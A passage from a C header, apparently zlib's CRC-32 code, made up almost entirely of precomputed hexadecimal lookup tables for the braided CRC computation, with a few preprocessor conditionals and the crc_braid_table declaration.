0xd141ed5c, 0xedc29d29, 0x73c237e5, 0x90c5b86b, 0x0ec512a7, 0x17ccd7ad, 0x89cc7d61, 0x6acbf2ef, 0xf4cb5823, 0x58d978fa, 0xc6d9d236, 0x25de5db8, 0xbbdef774, 0xa2d7327e, 0x3cd798b2, 0xdfd0173c, 0x41d0bdf0, 0xc6f32655, 0x58f38c99, 0xbbf40317, 0x25f4a9db, 0x3cfd6cd1, 0xa2fdc61d, 0x41fa4993, 0xdffae35f, 0x73e8c386, 0xede8694a, 0x0eefe6c4, 0x90ef4c08, 0x89e68902, 0x17e623ce, 0xf4e1ac40, 0x6ae1068c, 0xbba0ebd0, 0x25a0411c, 0xc6a7ce92, 0x58a7645e, 0x41aea154, 0xdfae0b98, 0x3ca98416, 0xa2a92eda, 0x0ebb0e03, 0x90bba4cf, 0x73bc2b41, 0xedbc818d, 0xf4b54487, 0x6ab5ee4b, 0x89b261c5, 0x17b2cb09, 0x909150ac, 0x0e91fa60, 0xed9675ee, 0x7396df22, 0x6a9f1a28, 0xf49fb0e4, 0x17983f6a, 0x899895a6, 0x258ab57f, 0xbb8a1fb3, 0x588d903d, 0xc68d3af1, 0xdf84fffb, 0x41845537, 0xa283dab9, 0x3c837075, 0xda853b53, 0x4485919f, 0xa7821e11, 0x3982b4dd, 0x208b71d7, 0xbe8bdb1b, 0x5d8c5495, 0xc38cfe59, 0x6f9ede80, 0xf19e744c, 0x1299fbc2, 0x8c99510e, 0x95909404, 0x0b903ec8, 0xe897b146, 0x76971b8a, 0xf1b4802f, 0x6fb42ae3, 0x8cb3a56d, 0x12b30fa1, 0x0bbacaab, 0x95ba6067, 0x76bdefe9, 0xe8bd4525, 0x44af65fc, 0xdaafcf30, 0x39a840be, 0xa7a8ea72, 0xbea12f78, 0x20a185b4, 0xc3a60a3a, 0x5da6a0f6, 0x8ce74daa, 0x12e7e766, 0xf1e068e8, 0x6fe0c224, 0x76e9072e, 0xe8e9ade2, 0x0bee226c, 0x95ee88a0, 0x39fca879, 0xa7fc02b5, 0x44fb8d3b, 0xdafb27f7, 0xc3f2e2fd, 0x5df24831, 0xbef5c7bf, 0x20f56d73, 0xa7d6f6d6, 0x39d65c1a, 0xdad1d394, 0x44d17958, 0x5dd8bc52, 0xc3d8169e, 0x20df9910, 0xbedf33dc, 0x12cd1305, 0x8ccdb9c9, 0x6fca3647, 0xf1ca9c8b, 0xe8c35981, 0x76c3f34d, 0x95c47cc3, 0x0bc4d60f, 0x3747a67a, 0xa9470cb6, 0x4a408338, 0xd44029f4, 0xcd49ecfe, 0x53494632, 0xb04ec9bc, 0x2e4e6370, 0x825c43a9, 0x1c5ce965, 0xff5b66eb, 0x615bcc27, 0x7852092d, 0xe652a3e1, 0x05552c6f, 0x9b5586a3, 0x1c761d06, 0x8276b7ca, 0x61713844, 0xff719288, 0xe6785782, 0x7878fd4e, 0x9b7f72c0, 0x057fd80c, 0xa96df8d5, 0x376d5219, 0xd46add97, 0x4a6a775b, 0x5363b251, 0xcd63189d, 0x2e649713, 0xb0643ddf, 0x6125d083, 0xff257a4f, 0x1c22f5c1, 0x82225f0d, 0x9b2b9a07, 0x052b30cb, 0xe62cbf45, 0x782c1589, 0xd43e3550, 0x4a3e9f9c, 0xa9391012, 0x3739bade, 0x2e307fd4, 0xb030d518, 0x53375a96, 0xcd37f05a, 0x4a146bff, 0xd414c133, 0x37134ebd, 0xa913e471, 0xb01a217b, 0x2e1a8bb7, 0xcd1d0439, 0x531daef5, 0xff0f8e2c, 0x610f24e0, 0x8208ab6e, 0x1c0801a2, 0x0501c4a8, 0x9b016e64, 0x7806e1ea, 0xe6064b26}}; #endif #endif #if N == 3 #if W == 8 local const z_crc_t FAR crc_braid_table[][256] = { {0x00000000, 0x81256527, 0xd93bcc0f, 0x581ea928, 0x69069e5f, 0xe823fb78, 0xb03d5250, 0x31183777, 0xd20d3cbe, 0x53285999, 0x0b36f0b1, 0x8a139596, 0xbb0ba2e1, 0x3a2ec7c6, 0x62306eee, 0xe3150bc9, 0x7f6b7f3d, 0xfe4e1a1a, 0xa650b332, 0x2775d615, 0x166de162, 0x97488445, 0xcf562d6d, 0x4e73484a, 0xad664383, 0x2c4326a4, 0x745d8f8c, 0xf578eaab, 0xc460dddc, 0x4545b8fb, 0x1d5b11d3, 0x9c7e74f4, 0xfed6fe7a, 0x7ff39b5d, 0x27ed3275, 0xa6c85752, 0x97d06025, 0x16f50502, 0x4eebac2a, 0xcfcec90d, 0x2cdbc2c4, 0xadfea7e3, 0xf5e00ecb, 0x74c56bec, 0x45dd5c9b, 0xc4f839bc, 0x9ce69094, 0x1dc3f5b3, 0x81bd8147, 0x0098e460, 0x58864d48, 0xd9a3286f, 0xe8bb1f18, 0x699e7a3f, 0x3180d317, 0xb0a5b630, 0x53b0bdf9, 0xd295d8de, 0x8a8b71f6, 0x0bae14d1, 0x3ab623a6, 0xbb934681, 0xe38defa9, 0x62a88a8e, 0x26dcfab5, 0xa7f99f92, 0xffe736ba, 0x7ec2539d, 0x4fda64ea, 0xceff01cd, 0x96e1a8e5, 0x17c4cdc2, 0xf4d1c60b, 0x75f4a32c, 0x2dea0a04, 0xaccf6f23, 0x9dd75854, 0x1cf23d73, 0x44ec945b, 0xc5c9f17c, 0x59b78588, 0xd892e0af, 0x808c4987, 0x01a92ca0, 0x30b11bd7, 0xb1947ef0, 0xe98ad7d8, 0x68afb2ff, 0x8bbab936, 0x0a9fdc11, 0x52817539, 0xd3a4101e, 0xe2bc2769, 0x6399424e, 0x3b87eb66, 0xbaa28e41, 0xd80a04cf, 0x592f61e8, 0x0131c8c0, 0x8014ade7, 0xb10c9a90, 0x3029ffb7, 0x6837569f, 0xe91233b8, 0x0a073871, 0x8b225d56, 0xd33cf47e, 0x52199159, 0x6301a62e, 0xe224c309, 0xba3a6a21, 0x3b1f0f06, 0xa7617bf2, 0x26441ed5, 0x7e5ab7fd, 0xff7fd2da, 0xce67e5ad, 0x4f42808a, 0x175c29a2, 0x96794c85, 0x756c474c, 0xf449226b, 0xac578b43, 0x2d72ee64, 0x1c6ad913, 0x9d4fbc34, 0xc551151c, 0x4474703b, 0x4db9f56a, 0xcc9c904d, 0x94823965, 0x15a75c42, 0x24bf6b35, 0xa59a0e12, 0xfd84a73a, 0x7ca1c21d, 0x9fb4c9d4, 0x1e91acf3, 0x468f05db, 0xc7aa60fc, 0xf6b2578b, 0x779732ac, 0x2f899b84, 0xaeacfea3, 0x32d28a57, 0xb3f7ef70, 0xebe94658, 0x6acc237f, 0x5bd41408, 0xdaf1712f, 0x82efd807, 0x03cabd20, 0xe0dfb6e9, 0x61fad3ce, 0x39e47ae6, 0xb8c11fc1, 0x89d928b6, 0x08fc4d91, 0x50e2e4b9, 0xd1c7819e, 0xb36f0b10, 0x324a6e37, 0x6a54c71f, 0xeb71a238, 0xda69954f, 0x5b4cf068, 0x03525940, 0x82773c67, 0x616237ae, 0xe0475289, 0xb859fba1, 0x397c9e86, 0x0864a9f1, 0x8941ccd6, 0xd15f65fe, 0x507a00d9, 0xcc04742d, 0x4d21110a, 0x153fb822, 0x941add05, 0xa502ea72, 0x24278f55, 0x7c39267d, 0xfd1c435a, 0x1e094893, 0x9f2c2db4, 0xc732849c, 0x4617e1bb, 0x770fd6cc, 0xf62ab3eb, 0xae341ac3, 0x2f117fe4, 0x6b650fdf, 0xea406af8, 0xb25ec3d0, 0x337ba6f7, 0x02639180, 0x8346f4a7, 0xdb585d8f, 0x5a7d38a8, 0xb9683361, 0x384d5646, 0x6053ff6e, 0xe1769a49, 0xd06ead3e, 0x514bc819, 0x09556131, 0x88700416, 0x140e70e2, 0x952b15c5, 0xcd35bced, 0x4c10d9ca, 0x7d08eebd, 0xfc2d8b9a, 0xa43322b2, 0x25164795, 0xc6034c5c, 0x4726297b, 0x1f388053, 0x9e1de574, 0xaf05d203, 0x2e20b724, 0x763e1e0c, 0xf71b7b2b, 0x95b3f1a5, 0x14969482, 0x4c883daa, 0xcdad588d, 0xfcb56ffa, 0x7d900add, 0x258ea3f5, 0xa4abc6d2, 0x47becd1b, 0xc69ba83c, 0x9e850114, 0x1fa06433, 0x2eb85344, 0xaf9d3663, 0xf7839f4b, 0x76a6fa6c, 0xead88e98, 0x6bfdebbf, 0x33e34297, 0xb2c627b0, 0x83de10c7, 0x02fb75e0, 0x5ae5dcc8, 0xdbc0b9ef, 0x38d5b226, 0xb9f0d701, 0xe1ee7e29, 0x60cb1b0e, 0x51d32c79, 0xd0f6495e, 0x88e8e076, 0x09cd8551}, {0x00000000, 0x9b73ead4, 0xed96d3e9, 0x76e5393d, 0x005ca193, 0x9b2f4b47, 0xedca727a, 0x76b998ae, 0x00b94326, 0x9bcaa9f2, 0xed2f90cf, 0x765c7a1b, 0x00e5e2b5, 0x9b960861, 0xed73315c, 0x7600db88, 0x0172864c, 0x9a016c98, 0xece455a5, 0x7797bf71, 0x012e27df, 0x9a5dcd0b, 0xecb8f436, 0x77cb1ee2, 0x01cbc56a, 0x9ab82fbe, 0xec5d1683, 0x772efc57, 0x019764f9, 0x9ae48e2d, 0xec01b710, 0x77725dc4, 0x02e50c98, 0x9996e64c, 0xef73df71, 0x740035a5, 0x02b9ad0b, 0x99ca47df, 0xef2f7ee2, 0x745c9436, 0x025c4fbe, 0x992fa56a, 0xefca9c57, 0x74b97683, 0x0200ee2d, 0x997304f9, 0xef963dc4, 0x74e5d710, 0x03978ad4, 0x98e46000, 0xee01593d, 0x7572b3e9, 0x03cb2b47, 0x98b8c193, 0xee5df8ae, 0x752e127a, 0x032ec9f2, 0x985d2326, 0xeeb81a1b, 0x75cbf0cf, 0x03726861, 0x980182b5, 0xeee4bb88, 0x7597515c, 0x05ca1930, 0x9eb9f3e4, 0xe85ccad9, 0x732f200d, 0x0596b8a3, 0x9ee55277, 0xe8006b4a, 0x7373819e, 0x05735a16, 0x9e00b0c2, 0xe8e589ff, 0x7396632b, 0x052ffb85, 0x9e5c1151, 0xe8b9286c, 0x73cac2b8, 0x04b89f7c, 0x9fcb75a8, 0xe92e4c95, 0x725da641, 0x04e43eef, 0x9f97d43b, 0xe972ed06, 0x720107d2, 0x0401dc5a, 0x9f72368e, 0xe9970fb3, 0x72e4e567, 0x045d7dc9, 0x9f2e971d, 0xe9cbae20, 0x72b844f4, 0x072f15a8, 0x9c5cff7c, 0xeab9c641, 0x71ca2c95, 0x0773b43b, 0x9c005eef, 0xeae567d2, 0x71968d06, 0x0796568e, 0x9ce5bc5a, 0xea008567, 0x71736fb3, 0x07caf71d, 0x9cb91dc9, 0xea5c24f4, 0x712fce20, 0x065d93e4, 0x9d2e7930, 0xebcb400d, 0x70b8aad9, 0x06013277, 0x9d72d8a3, 0xeb97e19e, 0x70e40b4a, 0x06e4d0c2, 0x9d973a16, 0xeb72032b, 0x7001e9ff, 0x06b87151, 0x9dcb9b85, 0xeb2ea2b8, 0x705d486c, 0x0b943260, 0x90e7d8b4, 0xe602e189, 0x7d710b5d, 0x0bc893f3, 0x90bb7927, 0xe65e401a, 0x7d2daace, 0x0b2d7146, 0x905e9b92, 0xe6bba2af, 0x7dc8487b, 0x0b71d0d5, 0x90023a01, 0xe6e7033c, 0x7d94e9e8, 0x0ae6b42c, 0x91955ef8, 0xe77067c5, 0x7c038d11, 0x0aba15bf, 0x91c9ff6b, 0xe72cc656, 0x7c5f2c82, 0x0a5ff70a, 0x912c1dde, 0xe7c924e3, 0x7cbace37, 0x0a035699, 0x9170bc4d, 0xe7958570, 0x7ce66fa4, 0x09713ef8, 0x9202d42c, 0xe4e7ed11, 0x7f9407c5, 0x092d9f6b, 0x925e75bf, 0xe4bb4c82, 0x7fc8a656, 0x09c87dde, 0x92bb970a, 0xe45eae37, 0x7f2d44e3, 0x0994dc4d, 0x92e73699, 0xe4020fa4, 0x7f71e570, 0x0803b8b4, 0x93705260, 0xe5956b5d, 0x7ee68189, 0x085f1927, 0x932cf3f3, 0xe5c9cace, 0x7eba201a, 0x08bafb92, 0x93c91146, 0xe52c287b, 0x7e5fc2af, 0x08e65a01, 0x9395b0d5, 0xe57089e8, 0x7e03633c, 0x0e5e2b50, 0x952dc184, 0xe3c8f8b9, 0x78bb126d, 0x0e028ac3, 0x95716017, 0xe394592a, 0x78e7b3fe, 0x0ee76876, 0x959482a2, 0xe371bb9f, 0x7802514b, 0x0ebbc9e5, 0x95c82331, 0xe32d1a0c, 0x785ef0d8, 0x0f2cad1c, 0x945f47c8, 0xe2ba7ef5, 0x79c99421, 0x0f700c8f, 0x9403e65b, 0xe2e6df66, 0x799535b2, 0x0f95ee3a, 0x94e604ee, 0xe2033dd3, 0x7970d707, 0x0fc94fa9, 0x94baa57d, 0xe25f9c40, 0x792c7694, 0x0cbb27c8, 0x97c8cd1c, 0xe12df421, 0x7a5e1ef5, 0x0ce7865b, 0x97946c8f, 0xe17155b2, 0x7a02bf66, 0x0c0264ee, 0x97718e3a, 0xe194b707, 0x7ae75dd3, 0x0c5ec57d, 0x972d2fa9, 0xe1c81694, 0x7abbfc40, 0x0dc9a184, 0x96ba4b50, 0xe05f726d, 0x7b2c98b9, 0x0d950017, 0x96e6eac3, 0xe003d3fe, 0x7b70392a, 0x0d70e2a2, 0x96030876, 0xe0e6314b, 0x7b95db9f, 0x0d2c4331, 0x965fa9e5, 0xe0ba90d8, 0x7bc97a0c}, {0x00000000, 0x172864c0, 0x2e50c980, 0x3978ad40, 0x5ca19300, 0x4b89f7c0, 0x72f15a80, 0x65d93e40, 0xb9432600, 0xae6b42c0, 0x9713ef80, 0x803b8b40, 0xe5e2b500, 0xf2cad1c0, 0xcbb27c80, 0xdc9a1840, 0xa9f74a41, 0xbedf2e81, 0x87a783c1, 0x908fe701, 0xf556d941, 0xe27ebd81, 0xdb0610c1, 0xcc2e7401, 0x10b46c41, 0x079c0881, 0x3ee4a5c1, 0x29ccc101, 0x4c15ff41, 0x5b3d9b81, 0x624536c1, 0x756d5201, 0x889f92c3, 0x9fb7f603, 0xa6cf5b43, 0xb1e73f83, 0xd43e01c3, 0xc3166503, 0xfa6ec843, 0xed46ac83, 0x31dcb4c3, 0x26f4d003, 0x1f8c7d43, 0x08a41983, 0x6d7d27c3, 0x7a554303, 0x432dee43, 0x54058a83, 0x2168d882, 0x3640bc42, 0x0f381102, 0x181075c2, 0x7dc94b82, 0x6ae12f42, 0x53998202, 0x44b1e6c2, 0x982bfe82, 0x8f039a42, 0xb67b3702, 0xa15353c2, 0xc48a6d82, 0xd3a20942, 0xeadaa402, 0xfdf2c0c2, 0xca4e23c7, 0xdd664707, 0xe41eea47, 0xf3368e87, 0x96efb0c7, 0x81c7d407, 0xb8bf7947, 0xaf971d87, 0x730d05c7, 0x64256107, 0x5d5dcc47, 0x4a75a887, 0x2fac96c7, 0x3884f207, 0x01fc5f47, 0x16d43b87, 0x63b96986, 0x74910d46, 0x4de9a006, 0x5ac1c4c6, 0x3f18fa86, 0x28309e46, 0x11483306, 0x066057c6, 0xdafa4f86, 0xcdd22b46, 0xf4aa8606, 0xe382e2c6, 0x865bdc86, 0x9173b846, 0xa80b1506, 0xbf2371c6, 0x42d1b104, 0x55f9d5c4, 0x6c817884, 0x7ba91c44, 0x1e702204, 0x095846c4, 0x3020eb84, 0x27088f44, 0xfb929704, 0xecbaf3c4, 0xd5c25e84, 0xc2ea3a44, 0xa7330404, 0xb01b60c4, 0x8963cd84, 0x9e4ba944, 0xeb26fb45, 0xfc0e9f85, 0xc57632c5, 0xd25e5605, 0xb7876845, 0xa0af0c85, 0x99d7a1c5, 0x8effc505, 0x5265dd45, 0x454db985, 0x7c3514c5, 0x6b1d7005, 0x0ec44e45, 0x19ec2a85, 0x209487c5, 0x37bce305, 0x4fed41cf, 0x58c5250f, 0x61bd884f, 0x7695ec8f, 0x134cd2cf, 0x0464b60f, 0x3d1c1b4f, 0x2a347f8f, 0xf6ae67cf, 0xe186030f, 0xd8feae4f, 0xcfd6ca8f, 0xaa0ff4cf, 0xbd27900f, 0x845f3d4f, 0x9377598f, 0xe61a0b8e, 0xf1326f4e, 0xc84ac20e, 0xdf62a6ce, 0xbabb988e, 0xad93fc4e, 0x94eb510e, 0x83c335ce, 0x5f592d8e, 0x4871494e, 0x7109e40e, 0x662180ce, 0x03f8be8e, 0x14d0da4e, 0x2da8770e, 0x3a8013ce, 0xc772d30c, 0xd05ab7cc, 0xe9221a8c, 0xfe0a7e4c, 0x9bd3400c, 0x8cfb24cc, 0xb583898c, 0xa2abed4c, 0x7e31f50c, 0x691991cc, 0x50613c8c, 0x4749584c, 0x2290660c, 0x35b802cc, 0x0cc0af8c, 0x1be8cb4c, 0x6e85994d, 0x79adfd8d, 0x40d550cd, 0x57fd340d, 0x32240a4d, 0x250c6e8d, 0x1c74c3cd, 0x0b5ca70d, 0xd7c6bf4d, 0xc0eedb8d, 0xf99676cd, 0xeebe120d, 0x8b672c4d, 0x9c4f488d, 0xa537e5cd, 0xb21f810d, 0x85a36208, 0x928b06c8, 0xabf3ab88, 0xbcdbcf48, 0xd902f108, 0xce2a95c8, 0xf7523888, 0xe07a5c48, 0x3ce04408, 0x2bc820c8, 0x12b08d88, 0x0598e948, 0x6041d708, 0x7769b3c8, 0x4e111e88, 0x59397a48, 0x2c542849, 0x3b7c4c89, 0x0204e1c9, 0x152c8509, 0x70f5bb49, 0x67dddf89, 0x5ea572c9, 0x498d1609, 0x95170e49, 0x823f6a89, 0xbb47c7c9, 0xac6fa309, 0xc9b69d49, 0xde9ef989, 0xe7e654c9, 0xf0ce3009, 0x0d3cf0cb, 0x1a14940b, 0x236c394b, 0x34445d8b, 0x519d63cb, 0x46b5070b, 0x7fcdaa4b, 0x68e5ce8b, 0xb47fd6cb, 0xa357b20b, 0x9a2f1f4b, 0x8d077b8b, 0xe8de45cb, 0xfff6210b, 0xc68e8c4b, 0xd1a6e88b, 0xa4cbba8a, 0xb3e3de4a, 0x8a9b730a, 0x9db317ca, 0xf86a298a, 0xef424d4a, 0xd63ae00a, 0xc11284ca, 0x1d889c8a, 0x0aa0f84a, 0x33d8550a, 0x24f031ca, 0x41290f8a, 0x56016b4a, 0x6f79c60a, 0x7851a2ca}, {0x00000000, 0x9fda839e, 0xe4c4017d, 0x7b1e82e3, 0x12f904bb, 0x8d238725, 0xf63d05c6, 0x69e78658, 0x25f20976, 0xba288ae8, 0xc136080b, 0x5eec8b95, 0x370b0dcd, 0xa8d18e53, 0xd3cf0cb0, 0x4c158f2e, 0x4be412ec, 0xd43e9172, 0xaf201391, 0x30fa900f, 0x591d1657, 0xc6c795c9, 0xbdd9172a, 0x220394b4, 0x6e161b9a, 0xf1cc9804, 0x8ad21ae7, 0x15089979, 0x7cef1f21, 0xe3359cbf, 0x982b1e5c, 0x07f19dc2, 0x97c825d8, 0x0812a646, 0x730c24a5, 0xecd6a73b, 0x85312163, 0x1aeba2fd, 0x61f5201e, 0xfe2fa380, 0xb23a2cae, 0x2de0af30, 0x56fe2dd3, 0xc924ae4d, 0xa0c32815, 0x3f19ab8b, 0x44072968, 0xdbddaaf6, 0xdc2c3734, 0x43f6b4aa, 0x38e83649, 0xa732b5d7, 0xced5338f, 0x510fb011, 0x2a1132f2, 0xb5cbb16c, 0xf9de3e42, 0x6604bddc, 0x1d1a3f3f, 0x82c0bca1, 0xeb273af9, 0x74fdb967, 0x0fe33b84, 0x9039b81a, 0xf4e14df1, 0x6b3bce6f, 0x10254c8c, 0x8fffcf12, 0xe618494a, 0x79c2cad4, 0x02dc4837, 0x9d06cba9, 0xd1134487, 0x4ec9c719, 0x35d745fa, 0xaa0dc664, 0xc3ea403c, 0x5c30c3a2, 0x272e4141, 0xb8f4c2df, 0xbf055f1d, 0x20dfdc83, 0x5bc15e60, 0xc41bddfe, 0xadfc5ba6, 0x3226d838, 0x49385adb, 0xd6e2d945, 0x9af7566b, 0x052dd5f5, 0x7e335716, 0xe1e9d488, 0x880e52d0, 0x17d4d14e, 0x6cca53ad, 0xf310d033, 0x63296829, 0xfcf3ebb7, 0x87ed6954, 0x1837eaca, 0x71d06c92, 0xee0aef0c, 0x95146def, 0x0aceee71, 0x46db615f, 0xd901e2c1, 0xa21f6022, 0x3dc5e3bc, 0x542265e4, 0xcbf8e67a, 0xb0e66499, 0x2f3ce707, 0x28cd7ac5, 0xb717f95b, 0xcc097bb8, 0x53d3f826, 0x3a347e7e, 0xa5eefde0, 0xdef07f03, 0x412afc9d, 0x0d3f73b3, 0x92e5f02d, 0xe9fb72ce, 0x7621f150, 0x1fc67708, 0x801cf496, 0xfb027675, 0x64d8f5eb, 0x32b39da3, 0xad691e3d, 0xd6779cde, 0x49ad1f40, 0x204a9918, 0xbf901a86, 0xc48e9865, 0x5b541bfb, 0x174194d5, 0x889b174b, 0xf38595a8, 0x6c5f1636, 0x05b8906e, 0x9a6213f0, 0xe17c9113, 0x7ea6128d, 0x79578f4f, 0xe68d0cd1, 0x9d938e32, 0x02490dac, 0x6bae8bf4, 0xf474086a, 0x8f6a8a89, 0x10b00917, 0x5ca58639, 0xc37f05a7, 0xb8618744, 0x27bb04da, 0x4e5c8282, 0xd186011c, 0xaa9883ff, 0x35420061, 0xa57bb87b, 0x3aa13be5, 0x41bfb906, 0xde653a98, 0xb782bcc0, 0x28583f5e, 0x5346bdbd, 0xcc9c3e23, 0x8089b10d, 0x1f533293, 0x644db070, 0xfb9733ee, 0x9270b5b6, 0x0daa3628, 0x76b4b4cb, 0xe96e3755, 0xee9faa97, 0x71452909, 0x0a5babea, 0x95812874, 0xfc66ae2c, 0x63bc2db2, 0x18a2af51, 0x87782ccf, 0xcb6da3e1, 0x54b7207f, 0x2fa9a29c, 0xb0732102, 0xd994a75a, 0x464e24c4, 0x3d50a627, 0xa28a25b9, 0xc652d052, 0x598853cc, 0x2296d12f, 0xbd4c52b1, 0xd4abd4e9, 0x4b715777, 0x306fd594, 0xafb5560a, 0xe3a0d924, 0x7c7a5aba, 0x0764d859, 0x98be5bc7, 0xf159dd9f, 0x6e835e01, 0x159ddce2, 0x8a475f7c, 0x8db6c2be, 0x126c4120, 0x6972c3c3, 0xf6a8405d, 0x9f4fc605, 0x0095459b, 0x7b8bc778, 0xe45144e6, 0xa844cbc8, 0x379e4856, 0x4c80cab5, 0xd35a492b, 0xbabdcf73, 0x25674ced, 0x5e79ce0e, 0xc1a34d90, 0x519af58a, 0xce407614, 0xb55ef4f7, 0x2a847769, 0x4363f131, 0xdcb972af, 0xa7a7f04c, 0x387d73d2, 0x7468fcfc, 0xebb27f62, 0x90acfd81, 0x0f767e1f, 0x6691f847, 0xf94b7bd9, 0x8255f93a, 0x1d8f7aa4, 0x1a7ee766, 0x85a464f8, 0xfebae61b, 0x61606585, 0x0887e3dd, 0x975d6043, 0xec43e2a0, 0x7399613e, 0x3f8cee10, 0xa0566d8e, 0xdb48ef6d, 0x44926cf3, 0x2d75eaab, 0xb2af6935, 0xc9b1ebd6, 0x566b6848}, {0x00000000, 0x65673b46, 0xcace768c, 0xafa94dca, 0x4eedeb59, 0x2b8ad01f, 0x84239dd5, 0xe144a693, 0x9ddbd6b2, 0xf8bcedf4, 0x5715a03e, 0x32729b78, 0xd3363deb, 0xb65106ad, 0x19f84b67, 0x7c9f7021, 0xe0c6ab25, 0x85a19063, 0x2a08dda9, 0x4f6fe6ef, 0xae2b407c, 0xcb4c7b3a, 0x64e536f0, 0x01820db6, 0x7d1d7d97, 0x187a46d1, 0xb7d30b1b, 0xd2b4305d, 0x33f096ce, 0x5697ad88, 0xf93ee042, 0x9c59db04, 0x1afc500b, 0x7f9b6b4d, 0xd0322687, 0xb5551dc1, 0x5411bb52, 0x31768014, 0x9edfcdde, 0xfbb8f698, 0x872786b9, 0xe240bdff, 0x4de9f035, 0x288ecb73, 0xc9ca6de0, 0xacad56a6, 0x03041b6c, 0x6663202a, 0xfa3afb2e, 0x9f5dc068, 0x30f48da2, 0x5593b6e4, 0xb4d71077, 0xd1b02b31, 0x7e1966fb, 0x1b7e5dbd, 0x67e12d9c, 0x028616da, 0xad2f5b10, 0xc8486056, 0x290cc6c5, 0x4c6bfd83, 0xe3c2b049, 0x86a58b0f, 0x35f8a016, 0x509f9b50, 0xff36d69a, 0x9a51eddc, 0x7b154b4f, 0x1e727009, 0xb1db3dc3, 0xd4bc0685, 0xa82376a4, 0xcd444de2, 0x62ed0028, 0x078a3b6e, 0xe6ce9dfd, 0x83a9a6bb, 0x2c00eb71, 0x4967d037, 0xd53e0b33, 0xb0593075, 0x1ff07dbf, 0x7a9746f9, 0x9bd3e06a, 0xfeb4db2c, 0x511d96e6, 0x347aada0, 0x48e5dd81, 0x2d82e6c7, 0x822bab0d, 0xe74c904b, 0x060836d8, 0x636f0d9e, 0xccc64054, 0xa9a17b12, 0x2f04f01d, 0x4a63cb5b, 0xe5ca8691, 0x80adbdd7, 0x61e91b44, 0x048e2002, 0xab276dc8, 0xce40568e, 0xb2df26af, 0xd7b81de9, 0x78115023, 0x1d766b65, 0xfc32cdf6, 0x9955f6b0, 0x36fcbb7a, 0x539b803c, 0xcfc25b38, 0xaaa5607e, 0x050c2db4, 0x606b16f2, 0x812fb061, 0xe4488b27, 0x4be1c6ed, 0x2e86fdab, 0x52198d8a, 0x377eb6cc, 0x98d7fb06, 0xfdb0c040, 0x1cf466d3, 0x79935d95, 0xd63a105f, 0xb35d2b19, 0x6bf1402c, 0x0e967b6a, 0xa13f36a0, 0xc4580de6, 0x251cab75, 0x407b9033, 0xefd2ddf9, 0x8ab5e6bf, 0xf62a969e, 0x934dadd8, 0x3ce4e012, 0x5983db54, 0xb8c77dc7, 0xdda04681, 0x72090b4b, 0x176e300d, 0x8b37eb09, 0xee50d04f, 0x41f99d85, 0x249ea6c3, 0xc5da0050, 0xa0bd3b16, 0x0f1476dc, 0x6a734d9a, 0x16ec3dbb, 0x738b06fd, 0xdc224b37, 0xb9457071, 0x5801d6e2, 0x3d66eda4, 0x92cfa06e, 0xf7a89b28, 0x710d1027, 0x146a2b61, 0xbbc366ab, 0xdea45ded, 0x3fe0fb7e, 0x5a87c038, 0xf52e8df2, 0x9049b6b4, 0xecd6c695, 0x89b1fdd3, 0x2618b019, 0x437f8b5f, 0xa23b2dcc, 0xc75c168a, 0x68f55b40, 0x0d926006, 0x91cbbb02, 0xf4ac8044, 0x5b05cd8e, 0x3e62f6c8, 0xdf26505b, 0xba416b1d, 0x15e826d7, 0x708f1d91, 0x0c106db0, 0x697756f6, 0xc6de1b3c, 0xa3b9207a, 0x42fd86e9, 0x279abdaf, 0x8833f065, 0xed54cb23, 0x5e09e03a, 0x3b6edb7c, 0x94c796b6, 0xf1a0adf0, 0x10e40b63, 0x75833025, 0xda2a7def, 0xbf4d46a9, 0xc3d23688, 0xa6b50dce, 0x091c4004, 0x6c7b7b42, 0x8d3fddd1, 0xe858e697, 0x47f1ab5d, 0x2296901b, 0xbecf4b1f, 0xdba87059, 0x74013d93, 0x116606d5, 0xf022a046, 0x95459b00, 0x3aecd6ca, 0x5f8bed8c, 0x23149dad, 0x4673a6eb, 0xe9daeb21, 0x8cbdd067, 0x6df976f4, 0x089e4db2, 0xa7370078, 0xc2503b3e, 0x44f5b031, 0x21928b77, 0x8e3bc6bd, 0xeb5cfdfb, 0x0a185b68, 0x6f7f602e, 0xc0d62de4, 0xa5b116a2, 0xd92e6683, 0xbc495dc5, 0x13e0100f, 0x76872b49, 0x97c38dda, 0xf2a4b69c, 0x5d0dfb56, 0x386ac010, 0xa4331b14, 0xc1542052, 0x6efd6d98, 0x0b9a56de, 0xeadef04d, 0x8fb9cb0b, 0x201086c1, 0x4577bd87, 0x39e8cda6, 0x5c8ff6e0, 0xf326bb2a, 0x9641806c, 0x770526ff, 0x12621db9, 0xbdcb5073, 0xd8ac6b35}, {0x00000000, 0xd7e28058, 0x74b406f1, 0xa35686a9, 0xe9680de2, 0x3e8a8dba, 0x9ddc0b13, 0x4a3e8b4b, 0x09a11d85, 0xde439ddd, 0x7d151b74, 0xaaf79b2c, 0xe0c91067, 0x372b903f, 0x947d1696, 0x439f96ce, 0x13423b0a, 0xc4a0bb52, 0x67f63dfb, 0xb014bda3, 0xfa2a36e8, 0x2dc8b6b0, 0x8e9e3019, 0x597cb041, 0x1ae3268f, 0xcd01a6d7, 0x6e57207e, 0xb9b5a026, 0xf38b2b6d, 0x2469ab35, 0x873f2d9c, 0x50ddadc4, 0x26847614, 0xf166f64c, 0x523070e5, 0x85d2f0bd, 0xcfec7bf6, 0x180efbae, 0xbb587d07, 0x6cbafd5f, 0x2f256b91, 0xf8c7ebc9, 0x5b916d60, 0x8c73ed38, 0xc64d6673, 0x11afe62b, 0xb2f96082, 0x651be0da, 0x35c64d1e, 0xe224cd46, 0x41724bef, 0x9690cbb7, 0xdcae40fc, 0x0b4cc0a4, 0xa81a460d, 0x7ff8c655, 0x3c67509b, 0xeb85d0c3, 0x48d3566a, 0x9f31d632, 0xd50f5d79, 0x02eddd21, 0xa1bb5b88, 0x7659dbd0, 0x4d08ec28, 0x9aea6c70, 0x39bcead9, 0xee5e6a81, 0xa460e1ca, 0x73826192, 0xd0d4e73b, 0x07366763, 0x44a9f1ad, 0x934b71f5, 0x301df75c, 0xe7ff7704, 0xadc1fc4f, 0x7a237c17, 0xd975fabe, 0x0e977ae6, 0x5e4ad722, 0x89a8577a, 0x2afed1d3, 0xfd1c518b, 0xb722dac0, 0x60c05a98, 0xc396dc31, 0x14745c69, 0x57ebcaa7, 0x80094aff, 0x235fcc56, 0xf4bd4c0e, 0xbe83c745, 0x6961471d, 0xca37c1b4, 0x1dd541ec, 0x6b8c9a3c, 0xbc6e1a64, 0x1f389ccd, 0xc8da1c95, 0x82e497de, 0x55061786, 0xf650912f, 0x21b21177, 0x622d87b9, 0xb5cf07e1, 0x16998148, 